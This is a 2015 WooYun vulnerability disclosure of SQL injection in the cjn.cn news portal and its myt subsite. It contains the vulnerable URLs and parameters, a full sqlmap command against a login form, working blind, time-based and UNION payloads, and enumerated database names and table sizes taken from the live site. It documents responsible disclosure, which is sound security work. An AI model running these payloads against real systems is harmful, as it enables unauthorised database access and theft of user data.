当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162508

漏洞标题:长江网主站及分站SQL注入漏洞

相关厂商:长江网

漏洞作者: Nelion

提交时间:2015-12-18 18:37

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-20: 厂商已经确认,细节仅向厂商公开
2015-12-30: 细节向核心白帽子及相关领域专家公开
2016-01-09: 细节向普通白帽子公开
2016-01-19: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

长江网主站及分站sql注入漏洞;非登陆,可注入大量数据;

详细说明:

长江日报官方网站,长江网(www.cjn.cn)是经武汉市委市政府决定,由湖北省政府新闻办申报,国务院新闻办批准的武汉地区唯一的综合性新闻网站,是全国重点地方新闻网站。下设新闻、视频新闻、体育、娱乐、论坛、博客、房产、汽车等多个栏目。内容权威性高,更新快,互动性强。紧紧围绕“新闻立网”的办网宗旨,在互联网上发布了解武汉、宣传武汉、建设武汉的公众信息,是省、市网络舆情直报点,并获得2005年度武汉市十佳网络服务示范企业称号,已成为武汉市对外宣传的重要阵地。
一、主站注入:
1、主站注入点:http://www.cjn.cn/dyx/shownum.php?id=

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-8792 OR 1003=1003#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (7261=7261) THEN SLEEP(5) ELSE 7261*(SELECT 7261 FROM INFORMATION
_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: MySQL UNION query (random number) - 4 columns
    Payload: id=-6174 UNION ALL SELECT 9355,9355,9355,CONCAT(0x7176706a71,0x6e516e47757148667548,0x7
1626b7671)#
---
[14:40:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12

漏洞证明:

2、主站所有数据库:

available databases [51]:
[*] #mysql50#cjntj.bak
[*] #mysql50#cjnvote.bak
[*] #mysql50#phpwind.bak
[*] cc
[*] ccvms
[*] cjnphoto
[*] cjnvote
[*] collabtive
[*] dwz
[*] information_schema
[*] maps
[*] mingpai
[*] mysql
[*] myt
[*] newdata_user
[*] osfc
[*] phpstat_mysql_10_mysql
[*] phpstat_mysql_10_mysql_log
[*] phpstat_mysql_1_mysql
[*] phpstat_mysql_1_mysql_log
[*] phpstat_mysql_2_mysql
[*] phpstat_mysql_2_mysql_log
[*] phpstat_mysql_3_mysql
[*] phpstat_mysql_3_mysql_log
[*] phpstat_mysql_4_mysql
[*] phpstat_mysql_4_mysql_log
[*] phpstat_mysql_5_mysql
[*] phpstat_mysql_5_mysql_log
[*] phpstat_mysql_6_mysql
[*] phpstat_mysql_6_mysql_log
[*] phpstat_mysql_7_mysql
[*] phpstat_mysql_7_mysql_log
[*] phpstat_mysql_8_mysql
[*] phpstat_mysql_8_mysql_log
[*] phpstat_mysql_9_mysql
[*] phpstat_mysql_9_mysql_log
[*] phpstat_mysql_mysql
[*] phpstat_web
[*] phpwind
[*] phpwindcs
[*] test
[*] TriAquae
[*] tweibo
[*] veryvote
[*] vsftpduser
[*] wh4z
[*] whwx
[*] wordpress
[*] xweibo
[*] xweibo2x
[*] zhenhao


3、主站当前库是veryvote,查看一下所有表及数据量:

Database: veryvote
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| votelogs        | 828940  |
| xh_ip           | 423311  |
| jdhyxlogs       | 190262  |
| nwwhlogs        | 87329   |
| d_vote          | 42369   |
| photo_yml       | 23530   |
| guestbook       | 14458   |
| ajax_vote       | 12020   |
| xfwhlogs        | 10553   |
| photo_xfwh      | 6563    |
| xh_question     | 5907    |
| jdhyx_dzps      | 4612    |
| dfnsvote_log    | 3819    |
| photo_mzy       | 3386    |
| jdhyx_card      | 3000    |
| Bl_web          | 2682    |
| Bl_web_reply    | 2406    |
| photo_nwwh      | 2379    |
| dfnsvote        | 1867    |
| `100_photo`     | 1677    |
| photo_lyzyz     | 1499    |
| nhdrlogs        | 1354    |
| xh_title        | 1300    |
| wawj            | 1178    |
| photo_whyr      | 1085    |
| photo_lyxr      | 898     |
| photo_29jhz     | 828     |
| photo_xswh      | 792     |
| photo_jdhyx     | 716     |
| Bl_mobile_reply | 641     |
| photo_dfbt      | 426     |
| photo_kqdnf     | 424     |
| xh_subject      | 398     |
| xh_userinfo     | 226     |
| photo_cb        | 221     |
| guestbook_1     | 139     |
| guestboard      | 129     |
| photo_nhdr      | 117     |
| `100_user`      | 116     |
| photo_city      | 107     |
| photo_dthl2012  | 93      |
| photo_glhd      | 85      |
| jkzx            | 70      |
| photo_ssdrpx    | 60      |
| ratings         | 60      |
| Bl_mobile       | 55      |
| wybl            | 53      |
| photo_wygl      | 48      |
| `100_hu`        | 38      |
| photo_wyjjy     | 36      |
| photo_dthl      | 29      |
| xh_config       | 29      |
| photo_taxi      | 28      |
| photo_tianshi   | 23      |
| photo_mqj       | 17      |
| photo_cjxn      | 14      |
| photo_city_by   | 8       |
| photo_wrw       | 5       |
| inews_user      | 4       |
| cjntg           | 3       |
| sj_photo_list   | 3       |
| keyword         | 1       |
| photo_mgdx      | 1       |
| sj_photo_xm     | 1       |
+-----------------+---------+


4、表中数据:

01主站表中数据库.png


二、分站注入:(post)
1、myt分站:

python sqlmap.py -u "http:/
/myt.cjn.cn/user/pf_login.php" --data "password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95
&username=88952634"


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=-6073' OR 1353=1
353#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634' AND (S
ELECT * FROM (SELECT(SLEEP(5)))rlTt)#
---
[15:19:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12


2、myt分站数据库:
available databases [2]:
[*] information_schema
[*] myt

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-20 11:49

厂商回复:

正在处理,谢谢

最新状态:

暂无